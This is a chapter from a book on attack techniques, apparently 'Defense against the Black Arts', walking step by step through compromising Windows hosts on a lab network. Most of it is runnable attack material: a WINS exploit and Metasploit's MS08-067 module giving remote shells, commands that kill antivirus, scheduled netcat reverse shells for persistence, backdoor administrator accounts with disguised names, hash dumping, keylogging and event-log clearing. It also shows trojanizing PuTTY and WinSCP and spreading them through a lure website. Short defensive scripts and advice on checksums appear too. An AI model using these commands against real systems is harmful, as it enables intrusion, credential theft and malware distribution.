[Screenshot: gcc wins.c -o wins.fun followed by ./wins.fun in a shell; with no arguments the program prints its usage, asking for a victim host, a connect-back IP and a port.]


The fact that there were no errors when the C code was compiled is a good thing. Sometimes the code will work correctly even if error messages were displayed during compilation. Once the code is compiled, run it by placing a dot and forward slash in front of it to indicate it should be run from the current directory. The compiled program, named wins.fun, indicated that I needed to specify the following three parameters:


1. A victim IP or hostname 
2. An IP address for the victim to connect back to 
3. A port on the attack machine for the victim to connect back to 


I turned on a VM of Windows 2000 Server SP4 with the WINS service running. Next, I started a Netcat listener on the attack machine on port 443 by typing nc -l -p 443. I typed the following command to exploit the remote system with my compiled wins.fun program:

■ ./wins.fun 192.168.1.250 192.168.1.100 443
  - 192.168.1.250 was the IP address of the victim
  - 192.168.1.100 is the IP address of the attack machine
  - 443 is the port the attack machine was listening on
[Screenshot: two Konsole windows. In the first, nc -l -p 443 receives the connection and shows:]

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

[In the second, ./wins.fun 192.168.1.250 192.168.1.100 443 reports that it is targeting the host and that the exploit was sent.]


The results of the execution of wins.fun with the correct parameters against the Windows 2000 
server running the WINS service provided me with a command shell on the victim's machine. 
Once you have a command shell, you can complete various tasks like account and data manipu- 
lation. Even though you could have used Metasploit to launch this exact attack, you did not 
need it in this case because the code was readily available on the Internet. However, that is 
not often the case. In many cases, you will need the Metasploit framework itself to launch the 
attack. 

Before I start the attack, I want to know the target OS on the victim. One way to discover this is by conducting an OS scan using Nmap. The Nmap program can be run from the msfconsole prompt. Type nmap -O followed by the IP address or fully qualified domain name (FQDN) of the victim.


[Screenshot: nmap -O 192.168.1.250 run from the msfconsole prompt. The scan reports the host up, 982 closed ports, a list of open TCP ports (including chargen, ftp, and ports 1028/tcp and 1029/tcp), a VMware MAC address, and OS details of Microsoft Windows Server 2003 SP1 or SP2, ending with "Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds".]
In this case the exact OS and service pack level are reported. Now I can search for exploits that will work against a system running Windows 2003 Server SP2. Another way to get this information is to use the Live HTTP Headers plug-in if the target is running a web server.

To add the Live HTTP Headers program: 


1. Open Firefox, go to www.google.com, and type add-ons.
2. Search for the Live HTTP Headers plug-in.
3. Click Add to Firefox and then restart Firefox.


[Screenshot: the Firefox add-on listing for Live HTTP Headers by Daniel Savard and Nikolas Coukouma (81 reviews, 16,195 weekly downloads): "View HTTP headers of a page and while browsing."]


After adding the plug-in, browse to the website. Right click on the page and select View Page Info. 
Click the Headers button at the top of the page. Look for the response headers from the server in 
the bottom pane to identify the version of the web server software. 


[Screenshot: the Page Info window (General, Permissions, Security and Headers tabs) with the request and response headers:]

Request Headers
REQUEST      GET / HTTP/1.1
Host         192.168.1.250
User-Agent   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Fi...
Accept       text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Response Headers
ETag                      "8a6a7e3bcdf3ca1:583"
MicrosoftOfficeWebServer  5.0_Pub
X-Powered-By              ASP.NET

[Note: headers are from network.]


You could do some googling and discover that Microsoft Internet Information Services (IIS) version 6 is used on Windows Server 2003. But, in case you do not feel like googling, here is a handy chart:

IIS 4.0 | NT4
IIS 5.0 | Windows 2000
IIS 6.0 | Windows 2003
IIS 7.0 | Windows 2008
IIS 8.0 | My guess: the next server released


A completely passive way to check the OS of a target is to go to www.netcraft.com. Put the 
FQDN of the target in the What's That Site Running box on the top left part of the screen. 


[Screenshot: the Netcraft Hosting History for the site:]

IP address      OS                    Web Server         Last changed
74.84.218.194   Windows Server 2003   Microsoft-IIS/6.0  6-Oct-2010
74.84.218.194   Windows Server 2003   Microsoft-IIS/6.0  2-Sep-2010
74.84.218.194   Windows Server 2003   Microsoft-IIS/6.0  19-Jul-2010
74.84.218.194   Windows Server 2003   Microsoft-IIS/6.0  4-Jun-2010
74.84.218.194   Windows Server 2003   Microsoft-IIS/6.0  19-May-2010

Netblock Owner (for every entry): Atlantic Business Technologies, 8015 Creedmoor Rd. Suite 201-A, Raleigh NC US 27613


260 ■ Defense against the Black Arts


One way to search for exploits specific to Microsoft OSs and their family of products is to type search ms0. In Metasploit, most of the exploits specific to Microsoft software (OS and application) start out with ms0, like windows/smb/ms08_067_netapi.


[Screenshot: the results of search ms0 in msfconsole, listing Microsoft exploits with their rank (good, normal, ...), including an Exchange 2000 exploit.]


Running the info command prior to the name of the exploit will provide you with details like which versions of the Microsoft OS are vulnerable. In the case of the windows/smb/ms08_067_netapi exploit, there are 60 versions of Windows that are vulnerable, including

■ Windows XP SP0 - SP3
■ Windows 2000 SP0 - SP4
■ Server 2003 SP0 - SP2


[Screenshot: info windows/smb/ms08_067_netapi in msfconsole: the description explains that the module exploits a parsing flaw in netapi32.dll, warns that the target service may crash, and says that support for NX bypass is under development; the references include a CVE entry.]


This attack requires that you attack port 445 on the victim machine. That means this attack would probably never work against a machine connected to the Internet. Machines connected to the Internet are almost always firewalled, and even if they have ports open, 445 is unlikely to be one of them. However, 445 is a port that is often open on a local area network (LAN). So this attack would most likely be initiated by someone within the LAN. Keep in mind that someone else on the same LAN as you might be connected to a hotspot or hotel network with you. Or, the attack could be from someone else residing on the inside of your network, like a student at a university. To successfully use this exploit, you need to know not only the OS, but also the patch level of the OS. Fortunately, there is an easy way to get this information using a scanner, which is one of Metasploit's auxiliary modules.
The following scanner works against a remote system running Windows XP, Windows 2000, or Windows Server 2003. To scan the host, type the following commands:

■ use scanner/smb/smb_version
■ set RHOSTS 192.168.1.250
■ run

Note: RHOSTS must match the IP address or addresses on your network.


[Screenshot: auxiliary/scanner/smb/smb_version run against 192.168.1.250, reporting the OS and the host name TRAINER.]


When typing the info command after viewing this exploit, you will see the full list of targets. For many exploits, the automatic target can be used. However, when I tried that with the windows/smb/ms08_067_netapi exploit, it failed to connect. So, I scanned the host with scanner/smb/smb_version to determine the patch level. The scanner informed me that the target is running Windows Server 2003 SP2. And since I am aware from googling that NX features are often turned on in this version of Windows, I am choosing 10 for my target.


[Screenshot: info windows/smb/ms08_067_netapi in msfconsole, showing the module title (a Stack Corruption exploit), its authors (hdm and Brett Moore of insomniasec.com) and the available targets: Windows 2000 Universal; Windows XP SP0/SP1 Universal; Windows XP SP2 English; Windows XP SP3 English; Windows 2003 SP0 Universal; Windows 2003 SP1 English (NO NX); Windows 2003 SP1 English (NX); Windows 2003 SP1 Japanese (NO NX); Windows 2003 SP2 English (NO NX); Windows 2003 SP2 English (NX).]
To exploit the remote system running Windows XP, Windows 2000, or Windows 2003, type

use windows/smb/ms08_067_netapi
set RHOST 192.168.1.250
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set target 10
exploit

Note the following:

■ RHOST must match the IP address of the victim.
■ LHOST must match the IP address of your attack machine.
■ Target must match the OS and SP level of the victim.


[Screenshot: the msfconsole session: set RHOST 192.168.1.250, set payload windows/meterpreter/reverse_tcp, set LHOST 192.168.1.100, the module options (RHOST 192.168.1.250 "The target address", RPORT "Set the SMB service port", SMBPIPE "The pipe name to use (BROWSER, ...)") and the payload options (EXITFUNC, LHOST), set target 10 (Windows 2003 SP2 English (NX)), then exploit.]


After you type the exploit command, if the attack succeeds you will have a meterpreter shell. If 
you see the message sending stage, Metasploit is attempting to initiate a connection with the vic- 
tim. Once you see the message “meterpreter session opened,” you have successfully attacked the 
victim machine. 
msf exploit(ms08_067_netapi) > exploit

Started reverse handler on 192.168.1.100:4444
Attempting to trigger the vulnerability...
Sending stage (749056 bytes) to 192.168.1.250
Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.250:1045) at 2010-11-01 09:26:49 +0000


Type ? to see a list of meterpreter commands. Some of the important commands include

shell: Gets you a command prompt on the remote system.
execute: Allows you to run a command, including a command prompt.
upload: Allows you to upload files to the victim machine.
download: Allows you to download files from the victim.
ps: Lists processes.
kill: Allows you to kill a process.
keyscan_start: Starts the keylogger.
keyscan_dump: Dumps the content of the keylogger.
reg: Allows you to edit the Windows registry.
clearev: Clears events in the event viewer logs.


Type use priv to see a list of additional meterpreter commands, including

■ getsystem: Allows you to use the system account, which has more power than administrator but is not typically utilized by users.
■ hashdump: Dumps the Windows hashes from the SAM file.
■ timestomp: Allows you to alter the time when files were created, modified, and accessed.


When the execute -i -f cmd.exe command is typed, the user is presented with a Windows command prompt. Type the sc query command to view started services.

1. execute -i -f cmd.exe
2. sc query

SERVICE_NAME: Norton AntiVirus Server
DISPLAY_NAME: Norton AntiVirus Client
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0


Another way to view the started services is by using net start. The net stop command will allow you to stop services, but not disable them.

1. net start
2. net stop "Norton AntiVirus Client"

C:\WINDOWS\system32>net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Client"
The Norton AntiVirus Client service is stopping..
The Norton AntiVirus Client service was stopped successfully.
While you are at a command prompt, you can also use the sc delete command to uninstall a service. In order to do this, you need to use the service name, not the display name.

The service name can be enumerated with the sc query command. The net start command only displays the display name of the service, not the service name. In this case, the attacker types the following command to delete the antivirus service from the registry:

1. sc delete "Norton AntiVirus Server"
2. Type exit to leave the command prompt environment and return to meterpreter.


[Screenshot: C:\WINDOWS\system32>sc delete "Norton AntiVirus Server", returning a [SC] DeleteService status line.]


In order for the service to be gone, the system will have to be restarted. Even though meterpreter has a reboot command, the hacker would not do that until they were confident they had a way back into the system. The service will be disabled at this point anyway. Although the antivirus server service was uninstalled, that does not mean all of the antivirus was uninstalled; only that specific component was removed. The meterpreter killav.rb script can be used to kill off all of the other antivirus components; typing run killav does this.


[Screenshot: meterpreter > run killav, reporting "Killing Antivirus services on the target..." followed by the processes it kills.]


There are a large number of meterpreter scripts that can be utilized when you have a meter- 
preter command on the victim machine. Some of the Ruby scripts will harvest information from 
the compromised computer. Other scripts will allow the attacker to install additional software 
such as SSH, RDP, and VNC that will give the hacker additional avenues of access. 


root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/

arp_scanner.rb            file_collector.rb         metsvc.rb                  scheduleme.rb
autoroute.rb              get_application_list.rb   migrate.rb                 schtasksabuse.rb
checkvm.rb                getcountermeasure.rb      multicommand.rb            scraper.rb
credcollect.rb            get_env.rb                multi_console_command.rb   screen_unlock.rb
domain_list_gen.rb        get_filezilla_creds.rb    multi_meter_inject.rb      search_dwld.rb
dumplinks.rb              getgui.rb                 multiscript.rb             service_permissions_escalate.rb
duplicate.rb              get_local_subnets.rb      netenum.rb                 srt_webdrive_priv.rb
enum_chrome.rb            get_loggedon_users.rb     packetrecorder.rb          uploadexec.rb
enum_firefox.rb           get_pidgin_creds.rb       panda_2007_pavsrv51.rb     virtualbox_sysenter_dos.rb
enum_logged_on_users.rb   gettelnet.rb              persistence.rb             vnc.rb
enum_powershell_env.rb    getvncpw.rb               pml_driver_config.rb       win32-sshclient.rb
enum_putty.rb             hashdump.rb               powerdump.rb               win32-sshserver.rb
enum_shares.rb            hostsedit.rb              prefetchtool.rb            winbf.rb
enum_vmware.rb            keylogrecorder.rb         process_memdump.rb         winenum.rb
event_manager.rb          killav.rb                 remotewinenum.rb           wmic.rb


To prove that antivirus is really gone, use the upload feature of meterpreter to upload Netcat, a file that most antivirus vendors flag as malicious. Netcat is one of several Windows executable files located within the /pentest/windows-binaries folder on BackTrack. In this case, the attacker types the following commands to upload Netcat and confirm that it runs:

1. upload /pentest/windows-binaries/tools/nc.exe c:\\windows\\system32
2. execute -i -f cmd.exe
3. nc -h


[Screenshot: the upload of /pentest/windows-binaries/tools/nc.exe to C:\windows\system32\nc.exe, then nc -h at the Windows command prompt printing the Netcat [v1.10 NT] usage: "connect to somewhere: nc [-options] hostname port[s] [ports] ...", "listen for inbound: nc -l -p port [options] [hostname] [port]", and the option list (detach from console, stealth mode; program to exec [dangerous!!]; source-routing hop point[s]; source-routing pointer: 4, 8, 12, ...).]


Once you have Netcat working on the compromised system, schedule a job that sends another command shell from the victim machine to the attack machine. To do this, type the following on your attack box running BackTrack:

■ Open up a Netcat listener by typing nc -l -p 443.

Note: Port 443 is commonly allowed through almost all firewalls.


[Screenshot: a Konsole window running nc -l -p 443 and waiting for a connection.]


In the meterpreter environment connected to the victim, type the following:

1. time /t

Note: Replace the time with 5 minutes after the current time displayed in Windows.

2. at 15:30 nc 192.168.1.100 443 -e cmd.exe

C:\WINDOWS\system32>time /t
time /t
03:16 PM

C:\WINDOWS\system32>at 15:20 nc 192.168.1.100 443 -e cmd.exe
at 15:20 nc 192.168.1.100 443 -e cmd.exe
Added a new job with job ID = 1


Once the time has elapsed, an additional command prompt should be sent to the attack system. It 
is always good to have a second connection in case the meterpreter session ends. 
root@bt:~# nc -l -p 443
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


The attacker can have the victim send out a command prompt every day at a specified time by typing:
1. at 16:00 /every:m,t,w,th,f,s,su nc 192.168.1.100 443 -e cmd.exe


Minimize your additional shell and go back to the shell connected to meterpreter. Wreak havoc 
on the system by typing the following commands: 


1. net user guest /active:yes
2. net user guest P@sswOrd
3. net user "SYSTEM " P@sswOrd /add
4. net user "LOCAL SERVICE " P@sswOrd /add
5. net localgroup administrators guest "LOCAL SERVICE " "SYSTEM " /add
6. net localgroup administrators
7. net user administrator /active:no
8. net user administrator /comment:0wned


Note: There is a space after the names SYSTEM and LOCAL SERVICE. The built-in administrator account can be disabled in Windows XP and higher (but is disabled by default in Vista and Windows 7).
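The look-alike accounts created above are easy to spot once you know what to look for: an ordinary local user whose name, after trimming whitespace, equals a built-in principal name. The following audit is an added example, not code from the book; it works over the text of net localgroup administrators saved to a file (which preserves the trailing space that the column layout of plain net user would hide), and the sample output and the expected-administrators baseline are constructed for this example.

```python
"""Added example, not from the book: audit the local Administrators group
for the look-alike accounts the steps above create.

"SYSTEM " and "LOCAL SERVICE " (note the trailing space) are ordinary local
users that display like the built-in NT AUTHORITY principals. The audit
works on the text of `net localgroup administrators` saved to a file, which
keeps trailing whitespace; the column layout of plain `net user` would hide
it. The sample output and the expected-admin baseline are constructed.
"""

# Built-in principal names that should never be a *local user account*.
BUILTIN_LOOKALIKES = {"system", "local service", "network service",
                      "trustedinstaller"}

# Baseline of who belongs in Administrators on this host (constructed; a real
# baseline comes from the host's build documentation).
EXPECTED_ADMINS = {"administrator"}


def parse_net_localgroup(text):
    """Return member names from `net localgroup <group>` output.

    Members are listed one per line between the dashed separator and the
    'The command completed successfully.' trailer. Lines are kept verbatim so
    a crafted trailing space in an account name survives.
    """
    members = []
    in_members = False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_members = True
            continue
        if line.startswith("The command completed"):
            break
        if in_members and line.strip():
            members.append(line)
    return members


def classify_member(name):
    """Describe why a member is suspicious, or return None if it is expected."""
    if name != name.strip():
        # No legitimate account is created with leading/trailing whitespace.
        return "whitespace-padded name %r" % name
    folded = name.casefold()
    if folded in BUILTIN_LOOKALIKES:
        return "local account named like built-in principal %r" % name
    if folded not in EXPECTED_ADMINS:
        return "unexpected Administrators member %r" % name
    return None


def audit_administrators(text):
    """Run every check over captured output and return the findings."""
    findings = []
    for member in parse_net_localgroup(text):
        finding = classify_member(member)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample reflecting the state the commands above produce.
SAMPLE = (
    "Alias name     administrators\n"
    "Comment        Administrators have complete and unrestricted access "
    "to the computer/domain\n"
    "\n"
    "Members\n"
    "\n"
    "-------------------------------------------------------------------\n"
    "Administrator\n"
    "guest\n"
    "LOCAL SERVICE \n"
    "SYSTEM \n"
    "The command completed successfully.\n"
)

if __name__ == "__main__":
    for finding in audit_administrators(SAMPLE):
        print(finding)
```

On the constructed sample the audit reports guest as an unexpected member and both padded names; the whitespace check fires before the name comparison because padding alone is enough to condemn an account.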


[Screenshot: the Netcat shell (cmd.exe via nc -l -p 443) showing the net localgroup administrators output (Administrators have complete and unrestricted access) and the net user administrator commands completing successfully]
The hacker may enable accounts; on Vista and Windows 7 the built-in administrator account is disabled by default, so enabling and using it may not even set off alarms for users. Another thing that hackers will want is passwords. The hashdump utility will obtain the password hashes from the registry. To obtain the Windows password hashes using Metasploit's hashdump,


1. Type exit to leave the command prompt and return to a meterpreter shell. 


2. hashdump 


Once the hashes are dumped, you can use a tool like John the Ripper or Cain and Abel, or just go to the website www.nediam.com.mx. If you want to use the website, the first hash is the LAN Manager (LM) hash and the second hash is the new technology (NT) hash. For Vista and higher, you need to get the NT hash.


[Screenshot: Windows Hashes Repository 1.0 on nediam.com.mx, Search NT Hash result: PASSWORD: toor, LM HASH: a9a1d510b01177d1aad3b435b51404ee, NT HASH: afc44ee7351d61d00698796da06b1ebf]


meterpreter > screenshot
Screenshot saved to: /root/yPYtClta.j


The screenshot will be sent to your desktop and can be opened with the Firefox browser. From this screenshot it appears that no one is logged in at the current time.
[Screenshot: /root/yPYtClta.jpeg opened in KView, showing the Windows Server 2003 Enterprise Edition logon screen: Press Ctrl-Alt-Delete to begin. Requiring this key combination at startup helps keep your computer secure. For more information, click Help. 800x600]


Capture the username and password at login by completing the following steps: 
1. ps 
2. migrate 368 

Note: Use the process ID (PID) for winlogon.exe. 


3. keyscan_start 
4. keyscan_dump 


Even though you obtained the password from cracking the hash, it is always good to have an alternative method. This administrator could not log in because the account was locked out.

The remote desktop protocol (RDP) can be enabled on the victim machine by using the getgui meterpreter script. The script will enable RDP and change the startup type of the service to automatic, even if it was previously set to disabled. It will also open the firewall port for 3389.


[Screenshot: output of the getgui script, showing Terminal Services being enabled, the port being opened, and the command to use for cleanup]


Once RDP has been enabled, the user can RDP to the victim box. In order to use remote 
desktop from a machine running Windows, type mstsc at the run box and do the following: 


1. Click the Options tab.
2. Click Local Resources.
3. Click More.
4. Select Drives, Plug and Play Devices, and Serial Ports.
5. Click OK.
6. Click General.
7. Type in the IP address and click Connect.


[Screenshot: Remote Desktop Connection, Local devices and resources dialog: Choose the devices and resources on this computer that you want to use in your remote session: Smart cards, Serial ports, Drives, Supported Plug and Play devices]


Use one of the accounts created earlier to log on to the server. If the SYSTEM account is used, a 
space after the word must be used in the username field. 


[Screenshot: Remote Desktop logon to 192.168.1.250 with the username and password fields filled in]


Once the hacker has logged in, they can search for files on the victim system, including PDF files, Excel files, Word documents, PowerPoint files, and other files.
[Screenshot: Windows Search Results window: Search by any or all of the criteria below, All or part of the file name]


When connected via RDP with local resources enabled, the attacker can copy items from your 
desktop (or drives) to the victim machine and copy items from the victim to your machine. 


" 


After the hacker has finished gathering data from the target, they can clear the event logs by 
using the clearev command within meterpreter. Clearing logs is a way for a hacker to attempt to 
hide the sequence of events from someone who may investigate the intrusion. However, the fact 
that the logs have been cleared may also be an indication that an intrusion has occurred. 


[Screenshot: clearev output, Wiping records from the Application, System, and Security logs]


The clearev command will delete almost all of the application, system, and security logs from the event viewer. However, there will be a log entry left in the security log that indicates the security log was cleared. Later versions of Windows will also log the fact that logs other than the security log have been cleared. For this reason, the hacker will often delete the security log last.


[Screenshot: Event Properties dialog. Date: 11/9/2010, Time: 9:06:15 PM, Type: Success Audit, Source: Security, Category: System Event, Event ID: 517. Description: The audit log was cleared. Primary User Name: SYSTEM, Primary Domain: NT AUTHORITY, Primary Logon ID: (0x0,0x3E7), Client User Name: SYSTEM, Client Domain: NT AUTHORITY, Client Logon ID: (0x0,0x3E7)]
Payload into EXE


The latest version of Metasploit gives the user the ability to encode an .exe file with a payload. Older hacking tools gave away the fact that they were not what the user supposed them to be by displaying an unfriendly blue and white icon:


These types of payloads might have tricked people initially, but even most people who have only been using computers for a few weeks would be hesitant to click on an executable file if there wasn't any type of icon associated with it. Even if someone was foolish enough to click on a file like bad.exe, viruses like these would be picked up by anti-virus (AV) even with old definitions. Metasploit is a game changer; the days of payloads with bad icons easily picked up by AV are over. Metasploit gives users the ability to put a payload into an existing executable that will not likely be detected by AV and will proceed right through the Windows firewall. Most people are unlikely to be suspicious if they click an .exe file and it runs as expected while a shell is connected to an attack machine in the background. Even if people have a number of years of experience, they are unlikely to notice that their machine is now owned. In the following image, one of these files has a malicious payload and the other is the legitimate file downloaded directly from the vendor. Can you tell which file is legitimate and which file is malicious?


[Screenshot: file details for two copies of WinSCP (SFTP, FTP and SCP client), one dated 1/10/2010 10:04 PM and one with Date created 11/9/2010 9:37 PM, both 6.03 MB]


Even a well-seasoned veteran of computer security isn't going to be able to easily notice if they open a program and it does what it is supposed to while opening a backdoor to an attacker. This is especially true if that program evades the detection of antivirus and passes through the firewall. The one thing that can save you in a situation like this is to get your software files from a reliable, trustworthy site, not just anywhere on the Internet. Some software manufacturers provide an MD5 or SHA1 hash for their file on the website; the hash can help you determine whether the software you download has been altered by a person with malicious intent. For example, another SSH client provides the md5sums for all of the downloads available on their website. When I google "Putty," the developer of the software is first on the list. This may not always be the case, as sometimes you will be directed to third parties to download software.


[Screenshot: PuTTY download page, For Windows on Intel x86: PuTTY putty.exe, PuTTYtel puttytel.exe, PSCP pscp.exe, PSFTP psftp.exe, Plink plink.exe, Pageant pageant.exe, PuTTYgen puttygen.exe, a .ZIP file putty.zip containing all the binaries (except PuTTYtel) and the help files, and a Windows installer putty<version>-installer.exe for everything except PuTTYtel; each is offered by HTTP or FTP with RSA and DSA signatures, and MD5 checksums for all the above files are in md5sums]
By clicking on the md5sums, we can see that the md5 hash for the file listed by the developer is 86d4901c603bcf9c9e80c8b613f2943b. I get the same hash when I hash the file after download.
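The manual comparison above is easy to script. The following checker is an added example, not code from the book or from the PuTTY project: it parses an md5sums-format list, hashes the downloaded bytes, and reports whether they match. The md5sums content is constructed for this example (the putty.exe line reuses the hash shown in the book; the sample.exe line uses the well-known MD5 of the bytes "abc"), and so are the "downloaded" bytes, so it runs offline.

```python
"""Added example, not from the book: verify a download against the vendor's
md5sums list, as the PuTTY page above allows.

An md5sums file has one '<32 hex digits>  <path>' line per file. The
putty.exe entry below reuses the hash the book shows; the second entry and
the 'downloaded' bytes are constructed so the check can run offline.
"""
import hashlib
import re

SUM_LINE = re.compile(r"^([0-9a-fA-F]{32})\s+\*?(\S.*?)\s*$")

# Constructed md5sums content (first line from the book's screenshot; the
# second is the well-known MD5 of the three bytes "abc").
MD5SUMS = (
    "86d4901c603bcf9c9e80c8b613f2943b  x86/putty.exe\n"
    "900150983cd24fb0d6963f7d28e17f72  x86/sample.exe\n"
)


def parse_md5sums(text):
    """Map each listed file's base name to its lowercase hash."""
    sums = {}
    for line in text.splitlines():
        m = SUM_LINE.match(line)
        if m:
            digest, path = m.group(1).lower(), m.group(2)
            sums[path.rsplit("/", 1)[-1]] = digest
    return sums


def md5_hex(data):
    """Hex MD5 of the downloaded bytes."""
    return hashlib.md5(data).hexdigest()


def verify_download(data, filename, md5sums_text):
    """Return 'ok', 'mismatch' (file altered or wrong build) or 'not listed'."""
    expected = parse_md5sums(md5sums_text).get(filename)
    if expected is None:
        return "not listed"
    return "ok" if md5_hex(data) == expected else "mismatch"


if __name__ == "__main__":
    print(verify_download(b"abc", "sample.exe", MD5SUMS))
    print(verify_download(b"definitely not putty", "putty.exe", MD5SUMS))
```

A matching checksum shows only that the bytes that arrived are the bytes the vendor listed. If the md5sums file comes from the same server over the same plain HTTP connection, a site that serves a trojanized binary can serve a matching md5sums file just as easily, and MD5 collisions have been practical for years. The RSA and DSA signatures offered beside each download, checked against a key obtained from somewhere other than the download page, are what tie the file to the developer.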


6c324c3282011bc779c015f16748e879  x86/pageant.exe
271451239dd4b9aa84931d949852ad92  x86/plink.exe
c60cf70003218b42d430f41823f1d67f  x86/pscp.exe
657e5b87511380cfe25d1de65f2554ee  x86/psftp.exe
86d4901c603bcf9c9e80c8b613f2943b  x86/putty.exe

[Screenshot: MD5 Hash dialog for the downloaded file, Hash: 86d4901c603bcf9c9e80c8b613f2943b]


A person could con people into downloading their loaded version of the software by increasing their Google rankings or by using various social engineering techniques. Some of the techniques that can be utilized to increase your Google rankings include visiting forums and posting links to the website you are trying to get people to use. Another trick could be posting links on Twitter or Facebook and getting your users to click them. Once executed, the file will open as expected while in the background a connection to the attacker's machine is launching. These encoded exploits will work on every Windows OS including Windows 7 and Server 2008.


[Screenshot: a tweet from jessevarsalone (jesse varsalone): "Putty, a great SSH tool." followed by a bit.ly link]


These payloads can be added to executables by using the msfpayload and msfencode programs of Metasploit. First the user needs to download or obtain the legitimate executable files. For this example, I will be trojanizing the following files on my "Great Downloads" site:


■ Scanning tools
  — ipscan.exe
  — scanline.exe
■ SSH tools
  — WinSCP.exe
  — Putty.exe
■ Windows tools
  — Mspaint.exe


After the legitimate .exe files are copied over to a machine running Metasploit, an output directory 
is created (loaded). The files can then be trojanized by typing the following commands: 


1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R | msfencode -t exe -x /home/ubuntu/Desktop/ipscan.exe -k -o /home/ubuntu/loaded/ipscan.exe -e x86/shikata_ga_nai -c 5

2. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=80 R | msfencode -t exe -x /home/ubuntu/Desktop/sl.exe -k -o /home/ubuntu/loaded/sl.exe -e x86/shikata_ga_nai -c 5

3. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=22 R | msfencode -t exe -x /home/ubuntu/Desktop/WinSCP.exe -k -o /home/ubuntu/loaded/WinSCP.exe -e x86/shikata_ga_nai -c 5

4. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=22 R | msfencode -t exe -x /home/ubuntu/Desktop/putty.exe -k -o /home/ubuntu/loaded/putty.exe -e x86/shikata_ga_nai -c 5

5. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=53 R | msfencode -t exe -x /home/ubuntu/Desktop/mspaint.exe -k -o /home/ubuntu/loaded/mspaint.exe -e x86/shikata_ga_nai -c 5


ubuntu@ubuntu:~$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=22 R | msfencode -t exe -x /home/ubuntu/Desktop/WinSCP.exe -k -o /home/ubuntu/loaded/WinSCP.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)


The loaded directory contains the trojanized files that can be uploaded to the web server. 


[Screenshot: the loaded directory in the Ubuntu file browser, containing ipscan.exe, mspaint.exe, putty.exe, sl.exe, and WinSCP.exe]


The next step for the attacker is to create their website and provide links to their loaded software. Their files can be hosted on a variety of OSs using any type of web server software. It does not matter if the website is running Apache or Microsoft IIS. Here are the directions to set up an IIS web server on Windows 2003:


1. Go to Start, Settings, Control Panel.
2. Add or Remove Programs.
3. Add Windows Components.
4. Add Application Server.
5. Click IIS and click Details.
6. Select World Wide Web Server.
7. Click OK twice, and provide the location of the i386 files on your CD-ROM.
[Screenshot: Internet Information Services (IIS) component dialog (To add or remove a component, click the check box. A shaded box means that only part of the component will be installed. To see what's included in a component, click Details.) listing Internet Information Services Manager, Internet Printing, NNTP Service, SMTP Service, and World Wide Web Service, with World Wide Web Service selected]


The attacker will then place all of the files in the inetpub\wwwroot folder. 


[Screenshot: Windows Explorer at C:\Inetpub\wwwroot showing putty.exe, mspaint.exe, ipscan.exe, sl.exe, default.htm, and WinSCP.exe]


Then, they can create a default.htm file in the inetpub\wwwroot folder with similar HTML code:

<html>
<body>
<h1>Index of /utilities/Jesse</h1>
<ul>
<li><a href="readme.txt"> readme.txt</a></li>
<h1>Scanning Tools</h1>
<li><a href="ipscan.exe"> ipscan.exe</a></li>
<li><a href="sl.exe"> sl.exe</a></li>
<h1>SSH Tools</h1>
<li><a href="WinSCP.exe"> WinSCP.exe</a></li>
<li><a href="putty.exe"> putty.exe</a></li>
<h1>Windows Tools</h1>
<li><a href="mspaint.exe"> mspaint.exe</a></li>
</ul>
<address>IIS Server Port 80</address>
</body></html>


The attacker needs to start a listener on their attack machine running Metasploit. In order to do this, the versatile multihandler can be used. After exploit is typed, the attacker will sit and wait for someone to launch the malicious payload and then a connection will open to the victim. To use the multihandler with the correct options in Metasploit,


1. Type msfconsole from the command line.
2. use multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set lhost 192.168.1.100
5. set lport 22
6. exploit


Note: Running the exploit command with the -z -j switch will allow multiple machines to 
connect. 


When the handler is listening, the message "Starting the payload handler" will be displayed. 


msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 22
lport => 22
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.100:22
[*] Starting the payload handler...


The victim will need to visit the website hosting the trojanized version of the software.


[Screenshot: Internet Explorer at http://192.168.1.250 showing Index of /utilities/Jesse with Scanning Tools, SSH Tools, and Windows Tools sections and the footer IIS Server Port 80; the status bar shows http://192.168.1.250/WinSCP.exe, Internet | Protected Mode: On; taskbar clock 10:54 PM, 11/10/2010]
The victim will then need to download and execute the file with the malicious payload.


[Screenshot: Internet Explorer prompt: Do you want to run or save this file? Name: WinSCP.exe, Type: Application, 6.03MB, From: 192.168.1.250. While files from the Internet can be useful, this file type can potentially harm your computer. If you do not trust the source, do not run or save this software. What's the risk?]


